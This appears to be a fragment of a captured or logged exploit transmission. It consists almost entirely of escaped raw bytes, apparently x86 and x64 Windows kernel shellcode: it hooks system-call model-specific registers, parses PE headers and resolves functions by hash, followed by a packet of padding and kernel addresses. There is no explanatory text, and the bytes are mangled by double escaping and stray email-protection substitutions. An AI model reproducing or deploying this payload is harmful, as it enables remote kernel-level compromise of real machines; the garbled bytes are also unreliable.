\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 6, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\
x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\